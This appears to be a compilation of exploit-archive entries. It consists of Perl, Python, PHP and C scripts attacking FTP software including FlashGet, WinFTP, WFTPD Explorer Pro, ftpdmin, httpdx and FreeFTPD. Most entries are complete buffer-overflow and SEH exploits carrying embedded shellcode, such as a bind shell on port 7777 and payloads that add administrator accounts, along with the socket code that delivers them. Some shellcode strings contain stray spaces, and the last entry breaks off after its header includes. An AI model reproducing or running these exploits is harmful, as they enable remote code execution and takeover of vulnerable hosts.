# http://enigmagroup.org/exploits/6240
##
# special thanks to a friend of mine who helped me
use IO::Socket;
####################################[ Parameters ]########################################
my $SHELLCODE =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x 6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x 4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x 6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x 4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x 80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\x e0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x 6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x 03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x 08\xa3\x03\x10";
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# The Host that will be listen to the Download request from Flashget
my $HOST = '127.0.0.1'; #your own ip
#################################[Don't Edit From Here]#####################################
######################################[Defines]#############################################
my $PADDING_CHAR = "A";
my $PADDING_SIZE = 324;
#The code will return to next_seh_chain so i make it as jump and invalid address
#so it will be decoded as last in chain.
my $NEXT_SEH_IN_CHAIN = "\xEB\x06\xFF\xFF"; # JMP +6
#Settings Return Address
my $CUR_SEH_ADDRESS = "\x8B\x19\x01\x10";
# Chosen Ret Addr is : 0x1001198B FlashGet\FGBTCORE.dll v1.0. 0.36
# 1001198B 5E POP ESI
# 1001198C 5B POP EBX
# 1001198D C3 RETN
# Building SEH Block
my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN .
$CUR_SEH_ADDRESS;
#Creating Payload
$PAYLOAD = $PADDING_CHAR x $PADDING_SIZE;
$PAYLOAD .= $SEH_BLOCK;
$PAYLOAD .= $SHELLCODE;
$PAYLOAD .= "\x90" x 300; #Putting alot of nops so the code will get Exception that we write after stack is over
#witch will make it to call our code
$LISTEN_PORT = 21;
################################################## ########################
print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit\r\n";
print "# Coded By SkOd, skod.uk\x40gmail\x2ecom\r\n";
my $serverSocket = new IO::Socket::INET (Listen => 1,
LocalAddr => $HOST,
LocalPort => $LISTEN_PORT,
Proto => 'tcp');
do
{
print "\r\n[~] listening...\r\n";
$clientSocket = $serverSocket->accept();
print "[+] New Connection Recived\r\n";
$clientSocket->send("220 WELCOME!\r\n");
$isPayloadSent = 0;
while($isPayloadSent == 0) {
$clientSocket->recv($recvBuffer,1024);
print "[~] Recived: " . $recvBuffer;
if($recvBuffer =~ /USER/) {
$clientSocket->send("331 Password required for l33t\r\n");
} elsif($recvBuffer =~ /PASS/) {
$clientSocket->send("230 User l33t logged in.\r\n");
} else {
$clientSocket->send("257 \"$PAYLOAD\"\r\n");
print("[+] The payload has been sent...\r\n");
$isPayloadSent = 1;
}
}
$clientSocket->close();
} while (true);
# [2008-08-15]
21 WinFTP 2.3.0 (LIST) Remote Buffer Overflow Exploit (post-auth)
#!/usr/bin/perl
#
# WinFTP 2.3.0 post-auth remote exploit. (www.wftpserver.com)
#
################################################## ##############################
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl #
# #
# Usage: winftp-remote.pl <host> <username> <password> <target> #
# #
# Target: 1 -> Win2k #
# Target: 2 -> WinXP sp2/3 (DoS only) #
# #
# root@halcyon:~/Exploits/WinFTP# perl winftp-remote.pl 10.0.0.5 user1 pass1 1 #
# #
# [=] Connected. #
# [=] Sending user user1 #
# [=] Sending pass pass1 #
# [=] Sending payload... #
# [=] Done. You should have a command shell on port 7777. #
# #
# root@halcyon:~/Exploits/WinFTP# nc 10.0.0.5 7777 #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-1999 Microsoft Corp. #
# #
# C:\Program Files\WinFTP Server> #
# #
################################################## ##############################
#
# Quick description of the exploit:
#
# There is a post-auth bug in WFTPSRV.exe (2.3.0), in the handling of the LIST
# command. This appears to be different from the previous vuln found in
# the handling of the NLIST command. Providing the server with
# "LIST *<long string here>" results in an arbitrary memory overwrite
# vulnerability. Note that simply giving LIST a long string won't trigger
# the vuln. At least in my testing, the asterisk was necessary to force
# WFTPSRV.exe to process the long string, which clobbers various stored
# addresses, providing an opportunity for an arbitrary DWORD overwrite.
# So exploitation goes like this:
#
# format string vuln -> overflow -> arbitrary memory overwrite -> EIP control
#
# On Win2k, the error is:
# "The instruction at 0x77fc9906 referenced memory at
# 0x88776655. The memory could not be "written".
#
# Which is what we want to see in order to control an arbitrary DWORD.
# At this point our registers look like:
#
# EAX 010922E0
# ECX 0275FC14
# EDX 88776655
# EBX 00000028
# ESP 0275F688
# EBP 0275F81C
# ESI 00F90000
# EDI 00F90378
# EIP 77FC9906 ntdll.77FC9906
#
# Instructions look like:
#
# 77FC98F4 8B48 08 MOV ECX,DWORD PTR DS:[EAX+8]
# 77FC98F7 898D 38FFFFFF MOV DWORD PTR SS:[EBP-C8],ECX
# 77FC98FD 8B50 0C MOV EDX,DWORD PTR DS:[EAX+C]
# 77FC9900 8995 34FFFFFF MOV DWORD PTR SS:[EBP-CC],EDX
# 77FC9906 890A MOV DWORD PTR DS:[EDX],ECX
# 77FC9908 8951 04 MOV DWORD PTR DS:[ECX+4],EDX
#
# Under normal conditions EDX and ECX contain pointers located
# in the data segment. However, after exploitation we control
# EDX (where to write), and ECX (what to write). From here,
# we load EDX with (almost) any old return address on our stack,
# and ECX with a pointer to our shellcode.
#
# Note: This is *not* a predictable vuln. I noticed even changing
# the filename of the binary causes the offsets to change.
# Please experiment on your own. Let me know if you manage to
# get it working under WinXP SP2.
# [email protected]
use IO::Socket;
if (@ARGV < 2) {
print "\nUsage: $0 <host> <username> <password> <target>\n\n";
print "Target: 1 -> Win2k\n";
print "Target: 2 -> WinXP sp2/3 (DoS only)\n\n";
exit;
};
$host = $ARGV[0];
$username = $ARGV[1];
$password = $ARGV[2];
$port = 21;
$list = "\x4c\x49\x53\x54\x20\x2a";
$padding = "\x41" x 272;
$sock = new IO::Socket::INET
(
PeerAddr=> "$host",
PeerPort=> "$port",
Proto => 'tcp'
);
die "Connection failed: $!\n\n" unless $sock;
$user_string = "user $username\r\n";
$pass_string = "pass $password\r\n";
$port_string = "PORT 10,0,0,1,154,119\r\n"; # Source host doesn't matter.
$address2k = "\x74\xf8\x74\x02". # <- This needs to contain any
# readable address, or we
# immediately cause an exception.
"\x14\xfc\x75\x02". # <- This will become EIP. It points
# to our shellcode.
"\x74\xf8\x75\x02"; # <- This specifies what DWORD to overwrite.
# YMMV here. I picked an arbitrary
# return address on the stack located
# near where ESP was during
# the exception. On my system this
# is:
#
# 0275F874 73D34154 RETURN to MFC42.73D34154
$nopsled = "\x90" x 2228;
# Metasploit win32_bind, EXITFUNC=process LPORT=7777
$shellcode =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x10".
"\x92\xe9\xd3\x83\xeb\xfc\xe2\xf4\xec\xf8\x02\x9e\x f8\x6b\x16\x2c".
"\xef\xf2\x62\xbf\x34\xb6\x62\x96\x2c\x19\x95\xd6\x 68\x93\x06\x58".
"\x5f\x8a\x62\x8c\x30\x93\x02\x9a\x9b\xa6\x62\xd2\x fe\xa3\x29\x4a".
"\xbc\x16\x29\xa7\x17\x53\x23\xde\x11\x50\x02\x27\x 2b\xc6\xcd\xfb".
"\x65\x77\x62\x8c\x34\x93\x02\xb5\x9b\x9e\xa2\x58\x 4f\x8e\xe8\x38".
"\x13\xbe\x62\x5a\x7c\xb6\xf5\xb2\xd3\xa3\x32\xb7\x 9b\xd1\xd9\x58".
"\x50\x9e\x62\xa3\x0c\x3f\x62\x93\x18\xcc\x81\x5d\x 5e\x9c\x05\x83".
"\xef\x44\x8f\x80\x76\xfa\xda\xe1\x78\xe5\x9a\xe1\x 4f\xc6\x16\x03".
"\x78\x59\x04\x2f\x2b\xc2\x16\x05\x4f\x1b\x0c\xb5\x 91\x7f\xe1\xd1".
"\x45\xf8\xeb\x2c\xc0\xfa\x30\xda\xe5\x3f\xbe\x2c\x c6\xc1\xba\x80".
"\x43\xc1\xaa\x80\x53\xc1\x16\x03\x76\xfa\xf7\xb2\x 76\xc1\x60\x32".
"\x85\xfa\x4d\xc9\x60\x55\xbe\x2c\xc6\xf8\xf9\x82\x 45\x6d\x39\xbb".
"\xb4\x3f\xc7\x3a\x47\x6d\x3f\x80\x45\x6d\x39\xbb\x f5\xdb\x6f\x9a".
"\x47\x6d\x3f\x83\x44\xc6\xbc\x2c\xc0\x01\x81\x34\x 69\x54\x90\x84".
"\xef\x44\xbc\x2c\xc0\xf4\x83\xb7\x76\xfa\x8a\xbe\x 99\x77\x83\x83".
"\x49\xbb\x25\x5a\xf7\xf8\xad\x5a\xf2\xa3\x29\x20\x ba\x6c\xab\xfe".
"\xee\xd0\xc5\x40\x9d\xe8\xd1\x78\xbb\x39\x81\xa1\x ee\x21\xff\x2c".
"\x65\xd6\x16\x05\x4b\xc5\xbb\x82\x41\xc3\x83\xd2\x 41\xc3\xbc\x82".
"\xef\x42\x81\x7e\xc9\x97\x27\x80\xef\x44\x83\x2c\x ef\xa5\x16\x03".
"\x9b\xc5\x15\x50\xd4\xf6\x16\x05\x42\x6d\x39\xbb\x e0\x18\xed\x8c".
"\x43\x6d\x3f\x2c\xc0\x92\xe9\xd3\x0d\x0a";
if ($ARGV[3] == '1')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
elsif ($ARGV[3] == '2')
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
else
{
$payload = $list.$padding.$address2k.$nopsled.$shellcode;
}
print "\n[=] Connected.\n";
sleep 1;
print "[=] Sending $user_string";
$sock->send($user_string);
sleep 1;
print "[=] Sending $pass_string";
$sock->send($pass_string);
sleep 1;
$sock->send($port_string);
sleep 1;
print "[=] Sending payload...\n";
$sock->send($payload);
sleep 1;
if ($ARGV[3] == '1')
{
print "[=] Done. You should have a command shell on port 7777.\n\n";
}
elsif ($ARGV[3] == '2')
{
print "[=] Done. WinFTP should be crashed on the remote host.\n\n";
}
else
{
print "[=] Done.\n\n";
}
# [2009-01-26]
21 WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit
#!/usr/bin/perl
#
# WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit
# ---------------------------------------------------
# Exploit by SkD ([email protected])
#
# This is a remote heap overflow exploit for
# WFTPD Explorer Pro 1.0 by Texas Imperial Software.
# (Vendors website = http://www.wftpd.com)
#
# Tested on Windows 2000 SP4.
#
# I haven't used the more common methods of overwritting
# PEB or UEF as it seemed both of them were not called
# when the heap was overflowed, probably due to clean
# clear ups when the overflow is detected. So I chose
# to overwrite a local SEH handler address. I have tested
# it numerously and the success rate is 100% in Win2k Sp4.
# The exploit is basically based on the PoC by r4x
# and it recreates the scenario but also exploits it by
# creating two sockets, which the vital point is the
# data socket.
#
# Enjoy it ladies & gents.
#
# Greets fly out to InTeL & str0ke.
#
# Note: Author has no responsibility over the damage you do
# with this!
use IO::Socket;
use warnings;
use strict;
print "[x] WFTPD Explorer Pro 1.0 Remote Heap Overflow Exploit\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n";
my @requests =
("USER", "PASS", "TYPE", "PWD", "PASV", "LIST");
my @response =
("331 Password required.\r\n", "230 User logged in.\r\n", "200 Type set to I.\r\n",
"257 '/' is current directory.\r\n", "227 Entering Passive Mode (127,0,0,1,100,100).\r\n",
"150 Opening ASCII mode data connection for file list.\r\n");
# win32_exec - EXITFUNC=thread CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x34".
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x34\x4e\x43\x 4b\x38\x4e\x47".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x 4a\x41\x4b\x48".
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x58\x 46\x43\x4b\x58".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x 46\x48\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x46\x30\x45\x47\x 45\x4e\x4b\x58".
"\x4f\x35\x46\x52\x41\x50\x4b\x4e\x48\x46\x4b\x38\x 4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x 4e\x31\x4b\x48".
"\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x52\x46\x50\x 43\x4c\x41\x43".
"\x42\x4c\x46\x36\x4b\x38\x42\x54\x42\x43\x45\x38\x 42\x4c\x4a\x47".
"\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x 4e\x31\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x 42\x38\x42\x4b".
"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x 4f\x45\x41\x33".
"\x48\x4f\x42\x56\x48\x45\x49\x58\x4a\x4f\x43\x38\x 42\x4c\x4b\x47".
"\x42\x45\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x 4a\x36\x4a\x59".
"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x 43\x36\x41\x36".
"\x4e\x36\x43\x56\x42\x30\x5a";
my $heapend = #The heap sometimes needs to be fed (end) with strange bytes ;)
"\x83\xc5\x7a\x83\xc5\x7a\x8b\x45\x00\xbd\x68\xc3\x d3\x55\xa7\x86". #No specific instructions
"\xb9\x42\x42\x42\x42\x40\x40\x40\x40\x39\x08\x75\x f8\xff\xe0\x2f". #No specific instructions
"\xef\xde\x50\xc6\xab\x54\xc3\x48\x9c\x4d\xa7\x9c\x f3\x54\xc7\x8a". #No specific instructions
"\x58\x61\xa7\xc2\x3d\x64\xec\x5a\x7f\xd1\xec\xb7\x d4\x94\xe6\xce". #No specific instructions
"\xd2\x97\xc7\x37\xe8\x01\x08\xc7\xa6\xb0\xa7\x9c\x f7\x54\xc7\xa5". #No specific instructions
"\x58\x59\x67\x48\x8c\x49\x2d\x28\x58\x49\xa7\xc2\x 38\xdc\x70\xe7". #No specific instructions
"\xd7\x96\x1d\x03\xb7\xde\x6c\xf3\x56\x95\x54\xcf\x 58\x15\x20\x48". #No specific instructions
"\xa3\x49\x81\x48\xbb\x5d\xc7\xca\x58\xd5\x9c\xc3\x d3\x55\xa7\xab". #No specific instructions
"\xef\x0a\x1d\x35\xb3\x03\xa5\x3b\x50\x95\x57\x93\x bb\xba\xe2\x23". #No specific instructions
"\xb3\x3d\xb4\x3d\x59\x5b\x7b\x3c\x34\x36\x4d\xaf\x b0\x55\x2c\xc3"; #No specific instructions
my $overflow1 = "\x41" x (1024 - length($shellcode));
my $overflow2 = "\x42" x 144;
my $overwriteaddr = "\x18\xfe\x91\x00"; #SEH Handler Address, will be called after a deliberate exception
my $shellcodeaddr = "\xd0\x7a\xd3\x00"; #Address of a huge sled of 0x41 bytes that will lead to the shellcode
my $heappart = "\x41" x 6 ."\xEB\x08".$shellcodeaddr.$overwriteaddr."\x41" x 6 ."\xEB\x08"; #JMPs here are used in some cases
my $payload = $overflow1.$shellcode.$heappart.$shellcodeaddr.$ov erwriteaddr.
$heapend.$overflow2."\r\n"; #Heap overflow packet payload ;)
while(1)
{
my $sock1=new IO::Socket::INET(Listen=>1,LocalAddr => "127.0.0.1",LocalPort=>21,Proto=>'tcp');
my $sock2=new IO::Socket::INET(Listen=>1,LocalAddr => "127.0.0.1",LocalPort=>25700,Proto=>'tcp');
die unless $sock1;
die unless $sock2;
print "[x] Waiting for clients ...\n";
my $s1;
my $s2;
while($s1=$sock1->accept()){
print "\t[x] Got a client !\n";
print $s1 "220 Welcome to SkD FTPDAEMON\r\n";
while(my $request = <$s1>){
my @arr = split("\x20", $request);
print "\t\t[x] Request = ".$arr[0]."\n";
if(length($arr[0]) == 0){
print $s1 "502 Command not implemented.\r\n";
sleep(0.25);
} elsif($arr[0] eq $requests[0]){
print $s1 $response[0];
sleep(0.25);
} elsif($arr[0] eq $requests[1]){
print $s1 $response[1];
sleep(0.25);
} elsif($arr[0] eq $requests[2]){
print $s1 $response[2];
sleep(0.25);
} elsif($arr[0] eq $requests[3]){
print $s1 $response[3];
sleep(0.25);
} elsif($arr[0] eq $requests[4]){
print $s1 $response[4];
sleep(0.25);
$s2 = $sock2->accept();
print "\t\t[x] Data socket connected!\n";
} elsif($arr[0] eq $requests[5]){
print "\t\t[x] Sending exploit ;)!\n";
print $s1 $response[5];
sleep(1);
print $s2 $payload;
sleep(1);
print "\t[x] Exploitation done.\n";
last;
}
}
print "\t[x] Client disconnected.\n";
close $sock1; #Clean up socket1
close $sock2; #Clean up socket2
last;
}
}
# [2009-01-29]
21 ftpdmin 0.96 RNFR Remote Buffer Overflow Exploit (xp sp3/case study)
<?php
/*
ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study)
by Nine:Situations:Group::surfista
software site: http://www.sentex.net/~mwandel/ftpdmin/
our site: http://retrogod.altervista.org/
bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite.
We can use 272 bytes before EIP and 119 after EIP, ESP and EBP points to
the second memory region.
We have a very small set of chars that we can use ,RNFR (Rename From) command
accept pathnames as argument, so characters whose integer representations are
in the range from zero through 31 and reserved chars are not allowed!
*/
error_reporting(7);
$ftp_server = "192.168.0.1";
$ftp_user = "anonymous";
$ftp_pass = "[email protected]";
function ftp_cmd($cmd){
global $conn_id;
echo "-> ".$cmd."\n";
$buff=ftp_raw($conn_id,$cmd);
}
#WinExec shellcode of mine, enconded with the alpha2 tool by SkyLined, adds
#a "surfista" admin user with pass "pass"
#contains hardcoded address, re-encode command:
#alpha2 esp < shdmp.txt
$____scode="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABu JI".
"Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9o kOe3BMrD5pTocS5".
"prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTos qctRdWPGVa6epPN".
"w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44 BOT2T3UpfOw1qTw".
"4gPqcpupr3VQybSrTE1kOA";
#do not touch, esp adjustment and subsequent call esp, very large but we have lots of unused space
$____code ="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABu JI".
"NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsU GPpipdUpesVVA";
if (strlen($____scode) > 272) {die("[!] shellcode too large!");}
$conn_id = ftp_connect($ftp_server) or die("(!) Unable to connect to $ftp_server");
if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) {
echo "(*) Connected as $ftp_user@$ftp_server\n";
} else {
die("(!) Unable to connect as $ftp_user\n");
}
$____jnk = str_repeat("\x66",272 - strlen($____scode));
$____eip="\x44\x3a\x41\x7e"; //0x7E413A44 jmp esp, user32.dll xp sp3
$____jnk_ii = str_repeat("\x66",119 - strlen($____code));
$____bof=$____scode.$____jnk.$____eip.$____code.$_ ___jnk_ii;
$____boom="RNFR ".str_repeat("x",0x0096);
ftp_cmd($____boom);
$____boom="RNFR ".$____bof;
ftp_cmd($____boom);
$____boom="RNFR ".str_repeat("x",0x0208);
ftp_cmd($____boom);
ftp_close($conn_id);
echo "(*) Done !\n";
?>
# [2009-04-13]
21 httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)
#!/usr/bin/python
# Usage : httpdx.py [target_ip]
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
# Bug : httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)
# Founder : sico2819
# Tested on : Xp sp3 (EN)(VB)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
# Serra7 Merra7 koulchi mderra7 :p
#[x] Note : I used the case when idm is installed because its dll (idmmbc.dll) is loaded with httpdx.
import socket
import sys
host = sys.argv[1]
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x50\x4b\x48\x45\x34\x4e\x33\x 4b\x58\x4e\x37"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x 4a\x41\x4b\x58"
"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x30\x45\x57\x 45\x4e\x4b\x58"
"\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x36\x4b\x38\x 4e\x50\x4b\x44"
"\x4b\x58\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x48\x 4e\x51\x4b\x48"
"\x41\x30\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x 43\x4c\x41\x33"
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x43\x45\x38\x 42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x54\x4e\x30\x4b\x38\x42\x47\x 4e\x41\x4d\x4a"
"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x 42\x58\x42\x4b"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x43\x 4f\x35\x41\x53"
"\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x38\x 42\x4c\x4b\x57"
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x55\x 4a\x56\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x 43\x46\x41\x56"
"\x4e\x36\x43\x36\x42\x30\x5a")
payload = shellcode
payload += '\x41'*(877 - len(shellcode))
payload += '\xE9\x8E\xFC\xFF\xFF'
payload += '\x90'*48
payload += '\x74\xC9\x90\x90'
payload += '\x87\x23\x02\x10'
payload += '\x44'*9000
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,21))
s.recv(1024)
s.send('USER '+payload+'\r\n')
raw_input("[+] Done, press enter to quit")
s.close()
# [2009-05-18]
21 httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)
#!/usr/bin/python
# Usage : httpdx_cwd.py [target_ip] user pass
# Example : httpdx_cwd.py 192.168.1.3 ftp 123
# Stack encouraged me to exploit this bug , so thx brotha
# _ _ _ __ _ _ _
#| || | (_) ___ / \ | |__ | | |
#| __ | | | (_-< | () | | / / |_ _|
#|_||_| |_| /__/ \__/ |_\_\ |_|
#
# Bug : httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)
# Refer : sico2819
# Tested on : Xp sp3 (EN)(VB)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ),Algerians Elites,snakespc.com
# Serra7 Merra7 koulchi mderra7 :p
#[x] Note : I used the case when idm is installed because its dll (idmmbc.dll) is loaded with httpdx.
import socket,sys,struct
def banner():
print "\nhttpdx <= 0.5b FTP Server (CWD) Remote Buffer Overflow Exploit.\n"
print "By: His0k4\n"
if len(sys.argv)!=4:
banner()
print "Usage: %s <ip> <user> <pass>" %sys.argv[0]
sys.exit(0)
# skape's egghunter shellcode
shellunt=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x 3c\x05\x5a\x74"
"\xef\xb8\x44\x7A\x32\x37\x8b\xfa\xaf\x75\xea\xaf\x 75\xe7\xff\xe7")
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x44\x7A\x32\x37\x44\x7A\x32\x37\x29\xc9\x83\xe9\x cd\xd9\xee\xd9"
"\x74\x24\xf4\x5b\x81\x73\x13\x05\x16\xf2\x06\x83\x eb\xfc\xe2\xf4"
"\xf9\xfe\xb6\x06\x05\x16\x79\x43\x39\x9d\x8e\x03\x 7d\x17\x1d\x8d"
"\x4a\x0e\x79\x59\x25\x17\x19\x4f\x8e\x22\x79\x07\x eb\x27\x32\x9f"
"\xa9\x92\x32\x72\x02\xd7\x38\x0b\x04\xd4\x19\xf2\x 3e\x42\xd6\x02"
"\x70\xf3\x79\x59\x21\x17\x19\x60\x8e\x1a\xb9\x8d\x 5a\x0a\xf3\xed"
"\x8e\x0a\x79\x07\xee\x9f\xae\x22\x01\xd5\xc3\xc6\x 61\x9d\xb2\x36"
"\x80\xd6\x8a\x0a\x8e\x56\xfe\x8d\x75\x0a\x5f\x8d\x 6d\x1e\x19\x0f"
"\x8e\x96\x42\x06\x05\x16\x79\x6e\x39\x49\xc3\xf0\x 65\x40\x7b\xfe"
"\x86\xd6\x89\x56\x6d\xe6\x78\x02\x5a\x7e\x6a\xf8\x 8f\x18\xa5\xf9"
"\xe2\x75\x9f\x62\x2b\x73\x8a\x63\x25\x39\x91\x26\x 6b\x73\x86\x26"
"\x70\x65\x97\x74\x25\x72\x88\x26\x37\x21\xd2\x29\x 44\x52\xb6\x26"
"\x23\x30\xd2\x68\x60\x62\xd2\x6a\x6a\x75\x93\x6a\x 62\x64\x9d\x73"
"\x75\x36\xb3\x62\x68\x7f\x9c\x6f\x76\x62\x80\x67\x 71\x79\x80\x75"
"\x25\x72\x88\x26\x2a\x57\xb6\x42\x05\x16\xf2\x06")
payload = '\x41'*26
payload += shellunt
payload += '\xEB\xDE\x90\x90'
payload += '\x87\x23\x02\x10'
payload += '\x44'*900
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((sys.argv[1],21))
except:
print "Can\'t connect to server!\n"
sys.exit(0)
s.recv(1024)
s.send('USER '+sys.argv[2]+'\r\n')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'\r\n')
s.recv(1024)
s.send('MKD '+shellcode+'\r\n') # i placed the shellcode in the MKD command ;)
s.recv(1024)
s.send('CWD '+payload+'\r\n')
print ("Egghunter is hunting...;)")
raw_input("[+] Shellcode will be executed when httpdx get closed")
s.close()
# [2009-05-19]
FreeFTPD <= 1.0.8 (USER) Remote Buffer Overflow Exploit
/*
_______ ________ .__ _____ __
___ __\ _ \ ____ \_____ \ | |__ / | | ____ | | __
\ \/ / /_\ \ / \ _(__ < ______ | | \ / | |__/ ___\| |/ /
> <\ \_/ \ | \/ \ /_____/ | Y \/ ^ /\ \___| <
/__/\_ \\_____ /___| /______ / |___| /\____ | \___ >__|_ \
\/ \/ \/ \/ 26\09\05 \/ |__| \/ \/
[i] Title: FreeFTPD Remote USER Buffer overflow
[i] Discovered by: barabas [mutsonline]
[i] Exploit by: Expanders
[ Why FTPD crash? ]
When logging option is enabled freeftpd copy the user and the pass supplied by the user in the memory before put it in a logfile.
----Code Snippet----
78001D5D MOV ECX,DWORD PTR SS:[ESP+4] Ftpd put in ECX SP+4 that point to the user supplied data.
--------------------
If attacker's username is too big for the size of the buffer first we go to overwrite SEH handler(1011 bytes) and then the stack itself.
Beacuse stack point to our buffer this code
----Code Snippet----
78001D90 MOV EAX,DWORD PTR DS:[ECX]
--------------------
will cause an access violation.
Code Execution is possible.
[ Timeline ]
This vulnerability was not comunicated to the author.
[ Links ]
www.x0n3-h4ck.org
*/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
